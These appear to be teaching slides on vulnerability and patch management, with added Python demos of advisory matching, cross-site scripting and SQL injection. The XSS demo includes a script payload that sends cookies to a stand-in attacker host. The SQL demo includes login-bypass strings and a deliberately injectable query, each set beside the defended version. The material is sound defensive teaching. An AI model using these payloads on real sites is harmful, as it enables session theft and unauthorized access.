Vulnerabilities
Vulnerabilities
• flaws in systems that allow them to be exploited
• provide a means for attackers to compromise hosts, servers and networks
Vulnerabilities
• 2 flavors
  • bugs – programming mistakes
    • errors in code that can crash a system, leave it in an insecure state or allow root access
    • the operational equivalent: incorrect firewall/router/IDS rules (misconfiguration)
  • flaws – improper design
    • failing to account for all possibilities in the design leads to code whose intended ‘features’ can be abused
Vulnerabilities
• 2-edged sword
  • publishing vulnerabilities and patches is the only way to get problems fixed
  • once published, attackers are aware of the vulnerability too (and can compare patched and unpatched code to locate it)
  • patch management is a MAJOR security problem!
Vulnerabilities
• ‘Security by Obscurity’
  • attempts to use secrecy to prevent knowledge of vulnerabilities
  • vendors of proprietary code are often accused of this
  • secrecy only delays discovery; it does not remove the flaw
• zero-day attack
  • an attack that exploits a vulnerability for which no patch exists yet – it takes place in the window between the vulnerability becoming known (to attackers, and perhaps the vendor) and a patch being released
Between a ‘rock and a hard place’
• what do you do if you discover a vulnerability in a product and a patch is not available?
• do you keep it secret until a patch is developed?
  • this leaves customers vulnerable (to anyone else who finds it)
  • the vendor may not work to fix it since there is no pressure
• do you publicize it to put pressure on the vendor?
  • knowing that by doing so you have notified the whole attacker community as well
Between a ‘rock and a hard place’
Example 1:
• in 2009 Microsoft announced a vulnerability in the SMB subsystem that could leave servers open to a DoS attack
• there was no patch yet
• IT managers had two choices
  • disable SMB – meaning file and print sharing (and systems that depend on it) would not work
  • wait for the patch and hope there would not be an incident
Between a ‘rock and a hard place’
Example 2:
• in 2008 a federal district judge in Massachusetts ordered MIT students NOT to present at DEF CON on a vulnerability in the MBTA ‘CharlieTicket’ fare system
• the judge said the intent was not to silence the students but to enforce a reasonable period during which a fix could be found
• the gag order was lifted, but not until after DEF CON had concluded
http://www.informationweek.com/news/security/vulnerabilities/210002185
Vulnerability Management
• many strategies for managing vulnerabilities
  • vulnerability scanners
  • vulnerability notification
  • vulnerability information online through CERT
  • vulnerability and penetration testing services
• these go hand-in-hand with adequate patch management
Vulnerability Scanners
• programs that scan a network, host or application for known vulnerabilities
• Types
  • port scanner – looks for open ports and the services (and versions) behind them (nmap)
  • network enumerator – provides information on groups, usernames, shares and services (nmap and Nessus)
  • network vulnerability scanner – looks for vulnerabilities in network resources and servers (Nessus, SAINT)
  • Web application security scanner – looks for vulnerabilities in Web servers and scripts (SAINT, Metasploit Pro)
  • database security scanner – looks for vulnerabilities in the DBMS and SQL code (Safety Lab Shadow Database Scanner)
Vulnerability Notification
• many vendors will either mail a notification or post to a Web site when a vulnerability has been found and how to patch it
• services exist that maintain vulnerability lists for multiple products and will provide notification
  • with many of these you provide a list of the software and versions in your organization
Vulnerability Notification
• examples
  • Vupen Security vulnerability services http://www.vupen.com/english/services/
  • SecureNet Solutions vulnerability notification service http://www.securenetsol.com/am_trial_terms.html
  • Secunia PSI (Personal Software Inspector), free for home users http://secunia.com/vulnerability_scanning/personal/
Vulnerability Notification
• CERT Coordination Center (CERT/CC) at Carnegie Mellon University, and US-CERT
  • publish advisories and a weekly bulletin of known vulnerabilities
  • the organization's security team matches its inventory of software and versions against this list
http://www.cert.org/advisories/
http://www.us-cert.gov/cas/bulletins/
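What "matching the inventory against the list" looks like in code, as an added example (not from the slides or from CERT). The advisory entries and the inventory are constructed; the `ADV-xxxx` identifiers are placeholders, not real advisory IDs. It assumes each bulletin entry can be reduced to a product name and an affected range in the usual `introduced <= version < fixed` form, and compares versions numerically so that 2.10 sorts after 2.9.

```python
"""Match a software inventory against a vulnerability list (added example)."""
from typing import NamedTuple


class Advisory(NamedTuple):
    ident: str
    product: str
    introduced: str  # first affected version (inclusive)
    fixed: str       # first patched version (exclusive)
    severity: str


SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}

ADVISORIES = [  # constructed data, placeholder IDs
    Advisory("ADV-0001", "OpenSSH", "5.0", "5.9", "high"),
    Advisory("ADV-0002", "Apache httpd", "2.2.0", "2.2.22", "medium"),
    Advisory("ADV-0003", "OpenSSH", "4.0", "5.3", "critical"),
]

INVENTORY = [  # constructed data: (host, product, installed version)
    ("web01", "Apache httpd", "2.2.15"),
    ("web01", "OpenSSH", "5.3p1"),
    ("bastion", "openssh", "4.7p1"),
    ("db01", "Apache httpd", "2.2.22"),
]


def parse_version(text):
    """'5.3p1' -> (5, 3). Numeric compare, so 2.10 > 2.9 and 7.4 == 7.4.0.
    Vendor suffixes (p1, -rc2) are dropped, which is adequate for bulletins
    that list plain dotted versions."""
    parts = []
    for piece in text.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    while len(parts) > 1 and parts[-1] == 0:  # 7.4.0 == 7.4
        parts.pop()
    return tuple(parts)


def is_affected(version, adv):
    v = parse_version(version)
    return parse_version(adv.introduced) <= v < parse_version(adv.fixed)


def match_inventory(inventory, advisories):
    """Return (host, product, version, advisory id, severity) for every
    installed package inside an advisory's affected range, most severe
    first so the security team can work the list top-down."""
    hits = []
    for host, product, version in inventory:
        for adv in advisories:
            if adv.product.lower() == product.lower() and is_affected(version, adv):
                hits.append((host, product, version, adv.ident, adv.severity))
    return sorted(hits, key=lambda h: (SEVERITY_RANK[h[4]], h[0], h[3]))


if __name__ == "__main__":
    for host, product, version, ident, severity in match_inventory(INVENTORY, ADVISORIES):
        print(f"{severity:8} {host:8} {product} {version}  -> {ident}")
```

The weak point of any such matcher is version parsing: distributions backport fixes without bumping the upstream version, so a host can show as "affected" while actually patched, and vice versa. That is why the output is a worklist to verify, not a final answer.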
Threats – the counterpart to vulnerabilities
• threats exploit vulnerabilities
  • vulnerability – you left your car unlocked
  • threat – criminals going through shopping center parking lots looking for unlocked cars
• Fortinet's FortiGuard Threat Research and Response Center provides threat reports and advisories http://www.fortiguard.com/
• awareness of the threat landscape helps prioritize which vulnerabilities to fix first
Top 3 Application Vulnerabilities
1 – Buffer overflow
• software may not enforce array bounds
• input longer than the buffer (an array used to hold I/O data) overflows it and overwrites adjacent memory – on the stack this includes the saved return address, so execution can be redirected into attacker-supplied code
• some malware works this way: ‘smashing the stack’
• most damaging in programs that run with privileged rights, since the injected code inherits those rights
• best addressed in design and programming (bounds checking, safe string functions, memory-safe languages)
• patches can often fix this in vendor-supplied software
http://www.windowsecurity.com/articles/Analysis_of_Buffer_Overflow_Attacks.html
http://www.youtube.com/watch?v=kZZgNnhxA_4 (6 min)
Top 3 Application Vulnerabilities According to CERT
2 – cross-site scripting (XSS)
• attacker-controlled script is injected into pages served by a trusted Web site (via a crafted link or stored input) and runs in victims' browsers with that site's privileges
• used in some ‘drive-by’ attacks and to steal sessions and credentials
• often relies on social engineering to get the user to follow a link (banks are especially targeted)
• Web developers can validate input and encode (cleanse) output for the context it is rendered in
• script disabling in the browser (although not always practical)
• use of a least-privilege account limits what a compromised browser session can do to the machine
http://www.ibm.com/developerworks/tivoli/library/s-csscript/
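The "validate input and cleanse output" bullet, shown as code in an added example (not from the slides or the linked article). The page fragments and the two attack strings are constructed; `query` stands in for an untrusted request parameter. The point it makes beyond the slide is that the right encoding depends on where the value lands: HTML body, quoted attribute, or URL.

```python
"""Cross-site scripting: raw vs. context-encoded output (added example)."""
import html
from urllib.parse import quote

# Constructed attack inputs
BODY_PAYLOAD = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" onfocus="alert(1)" autofocus="'


def render_unsafe(query):
    # Echoes the input straight into HTML body content: a <script> in it runs.
    return f"<p>Results for: {query}</p>"


def render_safe(query):
    # html.escape replaces < > & " ' with entities, so the browser displays the
    # text instead of parsing it as markup. Correct for HTML body context.
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def render_input_unsafe(query):
    # Attribute context: a " in the input closes the value and the rest of the
    # payload becomes new attributes, here an event handler that fires on load.
    return f'<input name="q" value="{query}">'


def render_input_safe(query):
    # The same encoder works for a quoted attribute because quote=True encodes ".
    return f'<input name="q" value="{html.escape(query, quote=True)}">'


def render_link_safe(query):
    # URL context: URL-encode first, then HTML-encode for the attribute.
    return f'<a href="/search?q={html.escape(quote(query, safe=""), quote=True)}">again</a>'


def has_injected_markup(fragment):
    """Crude check for the demo: did a tag or an event-handler attribute survive?"""
    low = fragment.lower()
    return "<script" in low or '" onfocus=' in low


if __name__ == "__main__":
    for name, fn in [("body unsafe", render_unsafe), ("body safe", render_safe)]:
        print(f"{name:12} {fn(BODY_PAYLOAD)}")
    for name, fn in [("attr unsafe", render_input_unsafe), ("attr safe", render_input_safe)]:
        print(f"{name:12} {fn(ATTR_PAYLOAD)}")
```

Input validation alone would not have caught `ATTR_PAYLOAD` on a field that legitimately accepts quotes; output encoding at the point of rendering is the control that holds regardless of what was stored.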
Top 3 Application Vulnerabilities According to CERT
3 – SQL injection
• attacker-supplied input passed through a Web form (or URL parameter) is spliced into a SQL statement and changes the query the DBMS executes
• can exploit a lack of security to read or modify the database and, with enough privilege, gain control of the server
• solution is to validate input and, above all, use parameterized queries (prepared statements) so that data is never interpreted as SQL
http://www.youtube.com/watch?v=jMQ2wdOmMIA (3 min)
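The login query is the textbook case; here it is as an added example (not from the slides or the linked video) with the vulnerable string-built form beside the parameterized one. It uses a constructed in-memory SQLite database; only the driver and its placeholder style (`?` for sqlite3) would differ for another DBMS. Passwords are stored in plain text purely to keep the demo short.

```python
"""SQL injection: string-built query vs. parameterized query (added example)."""
import re
import sqlite3

USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse", "admin"), ("bob", "hunter2", "user")],  # constructed rows
    )
    return conn


def login_vulnerable(conn, username, password):
    """Untrusted input spliced into the SQL text. A quote in the input ends the
    string literal and whatever follows is parsed as SQL:
      password  ' OR '1'='1   ->  ... AND password = '' OR '1'='1'   (true for every row)
      username  alice'--      ->  ... username = 'alice'-- ...       (password check commented out)
    """
    sql = ("SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    """Bound parameters travel separately from the statement; the DBMS never
    interprets their contents as SQL, whatever quotes or comments they hold."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def valid_username(username):
    """Allow-list validation (the slide's 'validate input'). Defense in depth,
    not a replacement for parameterization: passwords and free text cannot be
    restricted to a character class like this."""
    return USERNAME_RE.fullmatch(username) is not None


if __name__ == "__main__":
    conn = make_db()
    for user, pw in [("bob", "hunter2"), ("x", "' OR '1'='1"), ("alice'--", "wrong")]:
        print(f"{user!r:12} {pw!r:14} vulnerable={login_vulnerable(conn, user, pw)}  "
              f"safe={login_safe(conn, user, pw)}")
```

Escaping quotes by hand is the common half-fix; it breaks on numeric fields, on second-order injection and on DBMS-specific syntax, which is why bound parameters are the control to standardize on.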
Vulnerability Management
Gartner defines a 6-step vulnerability management process, including:
• Define policy
• Baseline the environment
• Prioritize vulnerabilities
• Mitigate vulnerabilities
• Maintain and monitor
Patch Management
• requires a coordinated effort
  • knowing which patches are available
  • testing patches before deployment
  • scheduling patch installation
http://www.patchmanagement.org/pmessentials.asp
• however – many systems remain unpatched
  • some applications (such as Firefox) push patches automatically
  • others (such as Adobe's) leave it to the user to decide
Patch Management
• although recognized as a major security problem, patch management is seen as a burden by traditional IT management
  • it sucks up resources
  • it adds nothing to the bottom line
http://www.computerworld.com.au/article/44872/patch_management_burdens_customers/?fp=16&fpid=0